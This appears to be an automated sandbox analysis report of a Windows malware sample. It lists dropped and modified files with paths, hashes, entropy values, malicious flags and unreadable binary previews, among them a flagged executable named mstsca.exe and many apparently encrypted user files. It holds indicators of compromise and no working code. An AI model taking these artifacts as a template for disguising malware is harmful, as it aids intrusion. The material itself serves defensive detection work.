                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\e346cd35-2444-406b-9a28-805b44471c0b\build3.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):343040
                                                                                                                                                                                                    Entropy (8bit):5.73995725543752
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6144:c2lWU/7qVQ5k6ykD5+nuMYCO/A27OIh5aGU5+QZJOR/A:vWUTdLykDsrYv/A2rhDcJO
                                                                                                                                                                                                    MD5:0FEA771099E342FACD95A9D659548919
                                                                                                                                                                                                    SHA1:9F8B56A37870F8B4AC5AA0FF5677A666F94C7197
                                                                                                                                                                                                    SHA-256:6F032F671284B3812373E90B0AB5B16EA737BD7DC87D22B8F2AABE558334E403
                                                                                                                                                                                                    SHA-512:2C1EEB2909ACDC1AC36A677DBA5131775E97DD107CD60F03BC6672BE1791B2DD83A9F588719CB376CC4771570C6B2C202E783E30450AE3C2AA48BBAF2EE049C3
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0a5Xt.[.t.[.t.[.jR..a.[.jR....[.jR..L.[.S. .s.[.t.Z...[.jR..u.[.jR..u.[.jR..u.[.Richt.[.........PE..L...7..^..........................................@..................................U......................................`...P....@...V......................4...`...................................@............................................text...p........................... ..`.rdata..............................@..@.data...8...........................@....rsrc....V...@...X..................@..@.reloc...@.......B..................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\MSO1033.acl
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):38059
                                                                                                                                                                                                    Entropy (8bit):7.9945159914987265
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:m2okgp8AHDxBcw+ouTQWAxfsdiBpbdNyN91Z7Vf9YPirt3OGxYBfev7TiGW:m77p/j/cyuTQ/9pq7nYKrt3h9v7TM
                                                                                                                                                                                                    MD5:9327A5DA830692239BBE4BC198E9A4D3
                                                                                                                                                                                                    SHA1:F5584CD095FCD8B9123A75A1AB8BE7914D207A88
                                                                                                                                                                                                    SHA-256:9482894A26DE43B4852D9F634B11237543E826C3660BA7FD15AE4A52C22FA5FF
                                                                                                                                                                                                    SHA-512:F99B09FC6FB86441B72377AB87EE0207B90362F8F29006731D6966A9CD0564D55D73F8179F35104AB90434C53290A55B5400931569DFBA95F7D677193C86966C
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .....MN.[`.*.f.K.C...DUkn.G....U.....}.s/a...r.P..+.+..\.sI....T.AV....6.......M_...n.../!....37l..l...{..{m....t.5.wK..C.{`.~..".Iq...J`..... .F.ug..Zs....Bs.g..*.a...+.......}..[...[8E$]a.\g....c.l..........^.-.__.....b..\w.>.l.,Q>f{>U.. ..xF....D.y\NV`{C.k.>N......B.'..q...)......wR..B,.}.ik...;.2O.>.........M.\.J0t.Z.r...I._...|._@..#..l+.C.....@=9EQi6.oC:l&..,.:.^c....v.I..r..rL.WL...1nu.>....h..lb..}m6..b..d......%.v...)..xM+`...%!.I.=..q...........'RSk..vI.#y/...XA...o..4..o.7QJ.,`E[(e.L......h#r~_{a.:Q.6r...!....O.Vu@.Hd...^.`..u....B...........Q]a..=/.Kc}.N1oSr.h..y....\.....g..._hB.fl.........A..R....Y.e._&.[..54`7M.sC....y....W.~..:.f..g..5x\....18.......&..['...c.Q?.O.{ .X..*l.R. ..M..!.6..W..Z....07.z<.pv.q.0g'.kh./KvS......ru...e..j.5V...............6|N...[..+....f......T..~.;...w<..J.R..xR.7....0h..f..].F...~.......zIML.?...B'..9.T..Q...ep..d=zG....[k..L..i..=q..c.W&.....L?.D.}..RI_.g...J).}lF.J}..in..~u..
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Templates.LNK
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1493
                                                                                                                                                                                                    Entropy (8bit):7.8608408452517935
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:UVVEGMRXoRzuLY1MlX4m7ha2o/B9+R/WTnkMSvCXHYM6lqsYG4BQ/eM5EbD:4RMYWGKhQltSvCXHYM6lqsYGZ/ejD
                                                                                                                                                                                                    MD5:D340917A0589964A0E3894340BA52D05
                                                                                                                                                                                                    SHA1:56ED4D92B5DE2831AEBB8024121781A487BE62EE
                                                                                                                                                                                                    SHA-256:D1C2E3B1EE26CC9B8B9FD61EA984B58DAF48D7BB8D782FF52E69D8BD01A3AA61
                                                                                                                                                                                                    SHA-512:77C90EDFB9549D7B6BB1DBBDD3A7554200AD73828C505AC3FB0C0AD39282F7359D93ABFCD8F0891952BCE4BCBE23A2E3B2AD2654A1D06CC03D7602FDFDF26AC5
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: l..fgF.D......o..O6..q'.8q......tt...<_3,N2..=.....!7q....e..k..e....+.a..:a.{?....P........b.....C.{.@..k.;..B.0q._...'........P....w.&d....-(..*...d.1..X...ts.Y.9Y...Zk.G.....@J%.....a7lC%..J$''d.}..R.9Uo.P...5..H...?<...:...8D..Osh'....X.x.+..`.NJ|.............-..}..Nq/q...?yG...8....'z.)g........E..e..n../........l.bZ...f.G..,.o.1....F..(......J.90.....G.;...a.....C-.(.BD.y...IE(W[;.....@M..V..,...|....L.F..=.1...06.S.]!...u.Fi..C)\O......d...=.F...O..o.....b..B(|.k..?......S%K(..q...+t:.q.....';..H/.\#8.~H.SWK=D...Z....'...'.0.|-6._M0Z4.....*.......7..WWU.....-7.P...GuY.2.FF......L....m.Pa.5..c.....&8..~V.4.].P.S-oV..(b....iq...F:.2VG..._\D..cP .M.....,.$.....e...S.%j.1.....[....W...+.._.x.z....B....{.,..c._...1..~.0#..h>...2............r.x...HV......ob..(.uY.n.K.............V...;M5...+>.......\.....TM;....B...N ...X._."-.3....Zedk..Z..o.<.t..&..Z.k..i>.v.+X..].>.....q`i..{.].,...p.~G....o.;.-.:3H..O..Zs.*..>&o...t.....T..4b...
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):357
                                                                                                                                                                                                    Entropy (8bit):7.237299611815208
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:0qlTw4VJdShobzLxM0P6HtBS3uM9MFGL0XAlSkwtH31UvKleO2SVelnXH75dExcq:0qyKxZetBECFpATv0e/Xkcii9a
                                                                                                                                                                                                    MD5:7784007FFDA0FCB5CAF08ED139DD0DA8
                                                                                                                                                                                                    SHA1:23097B25E3B3E1293E809C0EDA179DE54ED7ABE2
                                                                                                                                                                                                    SHA-256:96B4A814280D1630DF555945169DC6F526C42447D904D6A092ABA35B6E69931B
                                                                                                                                                                                                    SHA-512:6FCE484A0D7D8BC8D58894583B9713C28152891417785194987C73EAE09457C3A5B8CC124FB866E7D9D3C7FE433EFAB50D53071EF1E28EEFA70BB9B5273242E6
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .h....vxR.K....j.{...\].6.P[3.4.~.*....aaA.T.)...?..}~...tVD.f".....C.`...$.`J(Q.~.L..7..........`W.</iy..3..\.....)CL%...).._:.}.I.H...,.$S._.2...6/.~Y..D.....H..IT..e......M....9I......#J..").......z"o"..Ec..-..P:._.o..+......}1..q.}.p.2Y.8..I.h@....h..J<....i..5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):18267
                                                                                                                                                                                                    Entropy (8bit):7.989494919038788
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:hbTGOHspDFrCRRYQdBgTGZOXvgsz1CohV4+i:rsKRYyRcvglYVbi
                                                                                                                                                                                                    MD5:063EA6612B457A7D49D1D51572742F61
                                                                                                                                                                                                    SHA1:7406B0DB5CFBAE0ADB5301EA198815499726349F
                                                                                                                                                                                                    SHA-256:628A39F2F7B3B3BD791EA945B77EE20EF0B979C2FAC7654343F6EE49E5224426
                                                                                                                                                                                                    SHA-512:CF1BCF31D11FE1C535970E85FDBA5574E23D5BF09D74435E32674C5A920850BC20B54D5BE8E00D07EFC90B99F3A603F82A31933D6D90B4F0D1853B77F927BA4C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: }...*2S.~....!....w.%d,Z.N.b.XD..I!....k.K.3.NN......&2)....k..*K.@&\...bBt`5.."S}J7k..?x}..DC.....`..2.....`B....L..a*s../............."....P:.Q..7.FF...*.W....;f.3R0cs.J$.v.f....cz.{.....*\..".6.7....mI..N*.....G.qPA...g.s..:.r9PD".~..N.kfe!....NI4........u.8.Wh..f.dB.Y.:cG2.Q.^..KiK..]%...2.f.G....."..ZR.D... (..\..8...}cph4^Q....*[g&......lQ....k.gd....~..0...B.M....^....E...+.)yf'd.w.....V...]......,.yyU......t.J.8..9G.....[.yO..tr.......^..t;t.Js...k. .O..|.1.&.;B.....Y.n...u.r.c.18...;D*_..ro....YGh......IjTW..}.2XF...T..=..`}...'.m..(..lz.T..._F.........%.Q..8O.>rbR..;....{h>v....\. ..i.!~.2....t.l...9..1.7T.h....a..8...S....L.$..tRE3.M,......u.+....QI%..Q........Vu......+z.e.01?...R....eo~...k.U..A..A.:...1{...i....I.......y.O.3..Aa.4trU....._q...a..q.2....cq.jWjn...Kj.0.Htx+"..rp...F..N,.g]...?N4.a....../.".[....-..v2......o....`v$f\..?...O&.0.6.T....a[....._1..s.2..6.>...."...s0......e....JJ.F .....M/.P$....8j2@..]..ic.t.h...
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):349
                                                                                                                                                                                                    Entropy (8bit):7.233354216498113
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:GyHSOS7sa+bmFjtl6V502+ynbDn083oAv1KPBftvP82J2uhlc75dExcii96Z:0OS4NsfynV3oegftcZuzVcii9a
                                                                                                                                                                                                    MD5:9C98EEEB39B6A9A9CC4FA1639128DBFE
                                                                                                                                                                                                    SHA1:53FBA23D5A8506209149B2C2A8FD960932715593
                                                                                                                                                                                                    SHA-256:9D2C10E21F033FB68F1EBFD73704166E4953B1D992D36F28DCCAEBF3C9EE5E94
                                                                                                                                                                                                    SHA-512:AF65DBE7FDFA2E8C84EEE9C119408B5E7E52281CFE5EB369034C267D7E8BFCF88689C2E888893765F563AC3E80679143B8F02F3F4004A65C0FD373C06CB7B2D5
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....b..2.p...K..TF.p.....J..E.U...{V.D.v.......R.9.i.j...j...].>.R`_P)C...+.p.j...U..a..S.-U...j9...W..#V.l..0.......'O....!v..........Y*c.l.........l.7I...3.V...u.P.Z.0.34S]Z..|.7.G.....]_mGNX..A.^..\(..H....7U&o.jl.... ...O.........p#._.....y..1@......S.@.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\CameraRoll.library-ms
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1347
                                                                                                                                                                                                    Entropy (8bit):7.852789755134879
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:4HuojpoE90+XPeqI4xilz0DdyvHS2l9mtlmkMsZ9KguvAbpHxja8p/ftebD:4HuotoEO+X/zilz4dyK2Tg2OH9a8JKD
                                                                                                                                                                                                    MD5:B2DF0AB6C21360212241BAF2F26C4D8A
                                                                                                                                                                                                    SHA1:B31ED0EFE1A6B3C73273E84C6B32C9260A80F136
                                                                                                                                                                                                    SHA-256:DB6A16D440C019875AD7DB7F088F765CA9E88F06145506F4BC6534820A303873
                                                                                                                                                                                                    SHA-512:871024D8C89A5126A605DFCAE5AC9E98E0469EE3BB169A33220FAD28BC787ED720484A5ED56145625A16028D4956725D4197D63553F074A4E041B7A4AC8BF290
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....Wv.?..<].w...............O.!f........<.??6..$Qq........G.....B..>N...}.s.b.:...".9.b..e..:w.=|....1c..V`....].D..|.....{..=.....~e.f.........~...6K.+..@K..<.G_..b&....^v.I.Rf._..?s.?...7...8.^..... ......%.s..#.u.l..@GctdT.8..M.1.P.."...B.k.......Wy..t.i..O.&..R...u.......g.r.5}.&......M..m....v.$C.;qAe..~..r.mh.;.....u....:F..h<N.=..v.a......i..A.n.t......U....DF.|.Z..w......_7Y.I.!.....;......(Q.z..X..k...b6.Tl.O.....o@...}y..9......RF.P....x...Ur...g..p...k........!zsA..v{....;T....B.d...@..@.....0T..}a.f...e.8...THf.:.g.......'G.[zX..5f...H...?..g..'.0!p.........E..K3.%....}.cc.Z..8J.w...g.....2..M..0.Z.@.R$.g..t..w.8#.m......CJ.-.#....l.y(....q..x.%.{.i...V.p..b....F..<Kx.....F....$9QZ.@....;.5,.c......n.&:M. G..a.$X?.`.?..AVNQ.N...h....*+..........$........'V!D..}.J..A.....8(j5..s/.........../.D.....)..vJ...h..e..X.7p...7d.P?3........E.._....Y.%..G..>Q..`...u....]..:.D..bU;.7.fE..o.......U...M&/[V.~....pb.qO.g..w..@.D2...
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Documents.library-ms
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2419
                                                                                                                                                                                                    Entropy (8bit):7.919607768577544
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:jUtsmI/qneI2/m05WckUoz69l/rDPYYxoct2+ZsKErYED:jdnqeX75MUoeZDPYYOc24PEUQ
                                                                                                                                                                                                    MD5:6EFFC4974013AE03059DC39929475960
                                                                                                                                                                                                    SHA1:5C6526A7BBC21479D1FE0581567F79C16CBCC8FF
                                                                                                                                                                                                    SHA-256:9F915659E7F52509C328F75C4293CF2E328676442BD9DCD40CD0E32E06473D2F
                                                                                                                                                                                                    SHA-512:C1716F7F6E0427B1D33D36F72C49F379453DFB5171086B653DAFC3C17286F93FBB03CF0C25D274B15B54687CECF2F396365A21D0A4085BEBAB62040FDC2D812C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: |.....]..cS.f.TQ.|].$h.7..q_=/j..(.A..)...89..y...<.?..N.@.......7}r. ..11!...q.^"sd..]....$.!q.X.$...0F..............s.......|...U...^~B....5f.*..l..E.G."n.....&.Z..-&Y%.dR-.R.b..OP.<p...v.UB....l.J..i.a.f(.Ap..`+..j....Y...h_...d|.....s....2.M.F.....T...'.(Hh..ul\...J.x...T~....x.hb......W.........n.....w.lb....K.<..>Z..lp;...>..4}....QK...u..J.=....V...%....0..r#R..uE.vb.J.b].n.'/tg.c.f...I?.._A.|[6g............P@..t.e..`.u.....9...H.}."=.E...C..Q..a......[.....(.{.rf.._dS}.s.8...1.\C.m.sO|.w.7W..b.t^.H.u....%..ml...*...I:#..|.a .........^...K. .-I.@....a..A3.J,..../.s..{.o....+C.Qu...8...6.}3z...D7.XM.?.y...B.q...........-...o.....a.h......K.....wL....V.B..Ne.K...Z;..L......\.HeO:..F...!..A.....n?.^$.3..>.!.`....w.."....<E..r..A2.<\ ..A.L..*.}..;*..2...5:W.5.~."xT..>.wO.U.+z.*..=H2l....>.n.x.UE*Epj....?7..p...q'*."...6....2M.k.h.el.@.I...)....#.....,}.........Z.1.Op..d....OO....2@.........=...C..i-I.....zF.D.|=.$...x...sso
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Music.library-ms
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2376
                                                                                                                                                                                                    Entropy (8bit):7.925975515409831
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:yHT6Ccmzpe52DgWxa1Zq7ygjHG1Wnqu7xC8x8yEwRirY5nVKoB6qD:YJ3zpg2goKZq71HaWqu7xC8B9Qc5kpi
                                                                                                                                                                                                    MD5:03F2B45ECDD80B8FB6B88686CD5C516C
                                                                                                                                                                                                    SHA1:2DB10A92376439A29AB684F0CBBEB0BE51FAC8F5
                                                                                                                                                                                                    SHA-256:C0AD8E7E5C604B6EE3970AB5528D87394435E9117A1EF81DA582E36BD98932D8
                                                                                                                                                                                                    SHA-512:6AF92DECC5CC9AF1E2C085994BCAEE46D0B919534CDE83298C4F65A7D5A138F3DE5075F59683A52E29E59905FE3C9DFF5B3C211330C0A37293B58F2E6EC88F8C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: Ig.....b..].;.....c.x..:(L.l..o..R.. ..+....;e2.3..%q}.]...1H..LG....7.........,..k..q.B..N.............b.-..(+../.:N|.I..o.."..[.K0...3.S..#V..*.vkQ3.....y..2.n..p.J^.|.#f.\..z..B(.....~.. . "j..^.:....S..[..Q....=..#.6"..k4..E@.$..2.$W.Y.,....b.<..}#.@{r.....s..c0..".Q.4\.........fR..J....W..&v...u.|..mR....G.N.1.._.THy.G5.......I_...D.a..n...H.*.Ue)........XN .;._/TO.@.....1..h~.Jg...].{.\@`T..o.wy...t.FX.lO<.o.^.k.-..So...^.z.@.#y.{.0@h.V....<.....J.h..................|.k.Z...S...~..L....v.....K.j..Q.....;w...>+...5*.....a.......E.....*.>g9I...$....g..:.%..Wn.9...V...5. .}.....}.....g..+....k<f._...F...B...V.....O.W.6...]...;r#.&.....O.1.l......[....../..3.u.H.x.C'...~X..Q...m..^A.N...`.....jX. ..0.r......FF.+,.sz=j..k...8.hg.j.a.@].Ncn.....&.....Yg..jQA.6/d.9...|......m.0....)....0.B.e+..7.r....9N.$...<._.oGP..|*...s....3..b.fD..........- ...(h.x.A.7[.6.Y..U..........J. ..r7..:..x........n.U.C..F.l.<f<.b...>,.Z.r.f...^`...
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Pictures.library-ms
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2393
                                                                                                                                                                                                    Entropy (8bit):7.925774113920815
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:2EBLqwzoeJJd/lYg7YjXHSRl1LZM+64DKOXcB/PbIdC3Ix3OeD:2EBpHdzWiRPr64xW/TEC3IJOm
                                                                                                                                                                                                    MD5:55C62A95B4D7E1EE15F76BEE259FCB8B
                                                                                                                                                                                                    SHA1:77BEF658C77195CD9FF9340113AED7FF6F9C2A14
                                                                                                                                                                                                    SHA-256:18F69DC87DC4C3DDB8115EA97D2C92808D3CB273BA99DFCEDAA6898FAAAB267F
                                                                                                                                                                                                    SHA-512:E2E3A1315E4070FFABEBE8BDC6C0092F990ADE4FD8961D8D256314D5BD08D64B00D436B7FFACFA3A9260F2C9087BDFC039BF0CFC44CC79307A937CBFFE7B470F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: f.X.@T........,p.....R..{.+Z.(....M.Z....b....z...$U....k.b...=.;H7x....;.....S..?.u.=&8..n..D..H;..F..w..K.\.;;.fuU..[.z?.{bg.....~../......=.m......0.mJt.s.....0.>^1....*)|.8....}..k..9...mnl..H.X..z..b.o....A...ah....2.('.'....[:j....%.q....*.;s9.#1.@..}.5I}..e.....{D.Z>.=..^#|....p.[.H...jQR.10..a.M?..3Bo.i..2-G`*M.n^#.]..J...k...;=l..@&......P..m$f&....L.H.....-.6.?C.iZ9...*.D.w..W2]..!._>N..*.:..5,.....g.......5...5.;Q.Z7..=.V.j.`..<Z8...c....}r[.....@`.:~..^..;+.P_......ws....w..&(.p.^g.j..J.B../..v.....x.U.Rv.l....f...'...|..G.mzD5H..m.Hx...e}...............#..w..^.c5..!....e9d.<SO-1....9.M....g.+S...@vXn5.F.U_..w.....b..:....N..R..D:.......n.g.....j..`..q......;{."...?.T..3w+UEV.wgR.=....t\.ry.l[..WB..f-...t....6.G0n.qC..P_*.k..g..o"...m>...#."x..../.....=JT.X#D./u....i.........(.Y....s..V....Np..L9f...S.*.....}r.`.g*."..%D!m..'..4}.."t......1.....#.<...&td....Jk...<5R.\........%o..(..f............~b......H.{...x...g.!-.ia....A.=)W.
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Videos.library-ms
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2404
                                                                                                                                                                                                    Entropy (8bit):7.911818207408804
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:QhhCiIkx4qJoPYSbXyB1kjlZfuMbqBo0VEVOkPisKoOFD:QhhChkx4qiPYUtlxuMbqDVQOkTY
                                                                                                                                                                                                    MD5:2FED308CD07D4506B2269AE30F5879E1
                                                                                                                                                                                                    SHA1:517244AA3CBF40E97E975A735EDBF301308394F6
                                                                                                                                                                                                    SHA-256:9832E7F9D7606F7808BC2422CD095E1AD42EC3FFD46C411BB5BCA613C21F5B5D
                                                                                                                                                                                                    SHA-512:26470D4068C4F5B04788489DC32C258D05CFB0AF07C9C47A4B003CCC7387AD18F42017E61440294DCC95BF68DD9917CFEC33F68332C8CEA92E5605B80EABB26A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ]....'......Q...?...&..5Fy....}..)x..i....}p..<......E.../q.GYr2...p...$..v......xjr....p...#t...T...}..?".^..'..........\.j?)...!&.W....'.G.../...B.B`@9..g=:R.O.+......#....6.f[...>.....e...C.I...#L.J....|..%.v...T....H.L....x.c..D..:4E..e.....)uZ.d.<.....S..p....Q...B...3.....(z.....s...v...............>\o. .1.I...So...sl...5.]^..;d...f.4../."JN.J.o..s.K....F..7...hp.!{h..".s._.O..J...:0..9\$.U.;..[.....J...P...h........WQ............9..F......X...y"......^.0b..... ..(.@.2..y"..O$.}....1...].,......fPv.....=y..J....._:`.V@.^r;.DeI........\...?.d....)...a..'.`1.j.E...g.......m..k).....x'..../.J.%._..K....f..,s...`YQ..X].q...L.m.[WSr.`~..NZ|..O..U.F...1B.........\r_..Ywo..8|.a...mg+1Ivm-.T)....@#..`.#b"..I.wQ..g..._;.>q.|..$......S......D.....;.>.B.u *'..0o/..]1.x.. .+-....c.U...G...n.Ou...`..2}..a...x...P.'dE.......%MP......].....J.L..v....M..M.~3..l........E....@)......a".Nz....8....Eve...{.~.........t.....E..".X..a...AglB4`..I+u.....9..
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1865
                                                                                                                                                                                                    Entropy (8bit):7.901307770653989
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:Jn+XVZZEWPPtBvyNIK2ErIXBoZeFldewKOe6WBBHcVygHfJaUX3j8/PD:AlTBPlFyIcIkwKVxB84gHhaUX3A/b
                                                                                                                                                                                                    MD5:177C4C8A4AEDBE9975049D53CBDB2C4A
                                                                                                                                                                                                    SHA1:F93D47E455BE38B8315B64C1CBD44AC18A1C9804
                                                                                                                                                                                                    SHA-256:8BAD21E21A72FDAE59C9747154E719FECA444DA1BF41165935C91523083EF171
                                                                                                                                                                                                    SHA-512:9BCCF9FF94764A7544ABEB6E75294AB73E7313F6FF5A638ECE4D30627FED2D0CC58C6936F3769E49A3A6BAFB10DA1060D462BC6A39B5CC19C998F9A1F8F0E1C3
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .j.q..c..M&<.8.........g..1.q..i...,.E$.F.O1.....[w.{....`...>@NW[.. ./....~G#JX..p+x.h..X.M.m...t.....c..-...Sm^?C.J...j.....NP.%.qJl....u.........U..)....`.ab|?.....<...6.F.....4S.u..)A..a......M.3Z}z......_4qRI..x..?$"7N..S8.|.2.....>...<G. ..S..q...[> {..k...h...Gm.n.yx.V).g.=9.O......C...w......%0.=..-.._?.....b..@;v...K.ksy..)^. ..v....^.C(...}...t0i...0l...G....0.[......5..[.`.>.._n..Z...~wv.].F..Z.m..t..Rk...H..(I.|V)Cp.h.=......q..,-..p.....P..>......r.].M.&...$_....v,SB.xu..o@...Jt..*.(z%.q/....4AX..w,MV.Ajy.5.o{..R..e.c...m..F..I$k...j.>o...f?)@V..H ..[6$."...U..t..).v....k4[.$!..8.i.2...X#......J{...2.4.K.H....X.B......t}@(.2.........IAP...8Q...*,....t,.|..50......... ........!J..a..9..5.......0.X..oF.?.\....]...._.w...\p....`n.+.l.P.M>.%...{Z.6.I.:D.1Ne.W9.2 S....a..$bN....V. ^..:c;.d[...L\.....?.+ *...Z.B.k...i.I../%a.z.(....Q...mi.'yoI......=..7....1.....^|.S*...S..y1.+...e.....u.......+.gVR..U.,Dn "...\..=.6?.y......T.Na.
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):5961
                                                                                                                                                                                                    Entropy (8bit):7.96746245991314
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:duG6hzVvdOMNp3TM6gVluoyUg47eSH0ctQOwWmSkLyKRkxH/HqJZyqk1+dN:wGI0c8nuRUd7MVO+LMtH6gZQ
                                                                                                                                                                                                    MD5:F310098E1B50605A48131864F9DE48BB
                                                                                                                                                                                                    SHA1:7CE38ED97D44748863162FF5F68F985A31EBCDD0
                                                                                                                                                                                                    SHA-256:3974B5DBEB97B7B96A02906C11F2AE5AAE035B9FDDD161F66727C0ADD67CF0C7
                                                                                                                                                                                                    SHA-512:651F88AF7E53BD4D348F4DF4086295D497D6BF733A0D503860351EFF9804CAC12B068625C782010FC73F67C202C593792E04F77C2B004698A95DA3010B281371
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
